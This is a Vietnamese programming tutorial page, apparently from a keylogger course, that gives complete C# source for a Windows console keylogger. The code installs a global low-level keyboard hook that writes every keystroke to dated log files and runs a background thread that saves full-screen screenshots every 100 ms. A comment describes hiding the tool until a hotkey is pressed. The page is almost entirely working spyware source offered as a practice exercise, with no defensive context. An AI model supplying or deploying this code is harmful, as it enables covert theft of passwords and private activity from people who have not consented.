Chụp màn hình theo thời gian tool Keylogger với C# Console Application

Lập trình Keylogger với C# Application

5.0 (1 đánh giá)
Tạo bởi HowKteam Cập nhật lần cuối 22:58 12-12-2016 7.065 lượt xem 0 bình luận
Học nhanh

Danh sách bài học

Chụp màn hình theo thời gian tool Keylogger với C# Console Application

Không có gì tuyệt vời hơn là luyện tập với ví dụ thực tế. Nào cùng nhau thử thách bản thân với tool: Keylogger

Bạn nên có kiến thức về:

 • Console application
 • Threading
 • Bitmap
 • Vòng lặp
 • Xử lý chuỗi
 • Nhiều thứ linh tinh khác

Code Program.cs

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace KeyLogger
{
  class Program
  {
    #region hook key board
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

    private static LowLevelKeyboardProc _proc = HookCallback;
    private static IntPtr _hookID = IntPtr.Zero; 

    private static string logName = "Log_";
    private static string logExtendtion = ".txt";

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr SetWindowsHookEx(int idHook,
      LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
      IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    /// <summary>
    /// Delegate a LowLevelKeyboardProc to use user32.dll
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private delegate IntPtr LowLevelKeyboardProc(
    int nCode, IntPtr wParam, IntPtr lParam);

    /// <summary>
    /// Set hook into all current process
    /// </summary>
    /// <param name="proc"></param>
    /// <returns></returns>
    private static IntPtr SetHook(LowLevelKeyboardProc proc)
    {
      using (Process curProcess = Process.GetCurrentProcess())
      {
        using (ProcessModule curModule = curProcess.MainModule)
        {
          return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
          GetModuleHandle(curModule.ModuleName), 0);
        }
      }
    }

    /// <summary>
    /// Every time the OS call back pressed key. Catch them 
    /// then cal the CallNextHookEx to wait for the next key
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
    {
      if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
      {
        int vkCode = Marshal.ReadInt32(lParam);

        WriteLog(vkCode);
      }
      return CallNextHookEx(_hookID, nCode, wParam, lParam);
    }

    /// <summary>
    /// Write pressed key into log.txt file
    /// </summary>
    /// <param name="vkCode"></param>
    static void WriteLog(int vkCode)
    {
      Console.WriteLine((Keys)vkCode);
      string logNameToWrite = logName + DateTime.Now.ToLongDateString() + logExtendtion;
      StreamWriter sw = new StreamWriter(logNameToWrite, true);
      sw.Write((Keys)vkCode);
      sw.Close();
    }
    
    /// <summary>
    /// Start hook key board and hide the key logger
    /// Key logger only show again if pressed right Hot key
    /// </summary>
    static void HookKeyboard()
    {
      _hookID = SetHook(_proc);
      Application.Run();
      UnhookWindowsHookEx(_hookID);
    }
    #endregion   

    #region Capture
    static string imagePath = "Image_";
    static string imageExtendtion = ".png";

    static int imageCount = 0;
    static int captureTime = 100;

    /// <summary>
    /// Capture al screen then save into ImagePath
    /// </summary>
    static void CaptureScreen()
    {
      //Create a new bitmap.
      var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width,
                      Screen.PrimaryScreen.Bounds.Height,
                      PixelFormat.Format32bppArgb);

      // Create a graphics object from the bitmap.
      var gfxScreenshot = Graphics.FromImage(bmpScreenshot);

      // Take the screenshot from the upper left corner to the right bottom corner.
      gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X,
                    Screen.PrimaryScreen.Bounds.Y,
                    0,
                    0,
                    Screen.PrimaryScreen.Bounds.Size,
                    CopyPixelOperation.SourceCopy);

      string directoryImage = imagePath + DateTime.Now.ToLongDateString();

      if (!Directory.Exists(directoryImage))
      {
        Directory.CreateDirectory(directoryImage);
      }
      // Save the screenshot to the specified path that the user has chosen.
      string imageName = string.Format("{0}\\{1}{2}", directoryImage, DateTime.Now.ToLongDateString() + imageCount, imageExtendtion);

      try
      {
        bmpScreenshot.Save(imageName, ImageFormat.Png);
      }
      catch
      {

      }
      imageCount++;
    }

    #endregion

    #region Timer
    static int interval = 1;
    static void StartTimmer()
    {
      Thread thread = new Thread(() => {
        while (true)
        {
          Thread.Sleep(1);

          if (interval % captureTime == 0)
            CaptureScreen();

          interval++;

          if (interval >= 1000000)
            interval = 0;
        }
      });
      thread.IsBackground = true;
      thread.Start();
    }
    #endregion
    static void Main(string[] args)
    {
      StartTimmer();
      HookKeyboard();
    }
  }
}

Bài sau chúng ta sẽ cùng nhau tìm hiểu cách tạo hotkey.

Đừng quên: “Luyện tập – Thử thách – Không ngại khó


Thảo luận

Nếu bạn có bất kỳ khó khăn hay thắc mắc gì về khóa học, đừng ngần ngại đặt câu hỏi trong phần BÌNH LUẬN bên dưới hoặc trong mục HỎI & ĐÁP trên thư viện Howkteam.com để nhận được sự hỗ trợ từ cộng đồng.

Nội dung bài viết

Tác giả/Dịch giả

Khóa học

Lập trình Keylogger với C# Application

Lập trình Keylogger với C# Application

Đánh giá

trungtamluyenthicasio đã đánh giá 13:24 28-02-2020

Bình luận

Để bình luận, bạn cần đăng nhập bằng tài khoản Howkteam.

Đăng nhập
Không có video.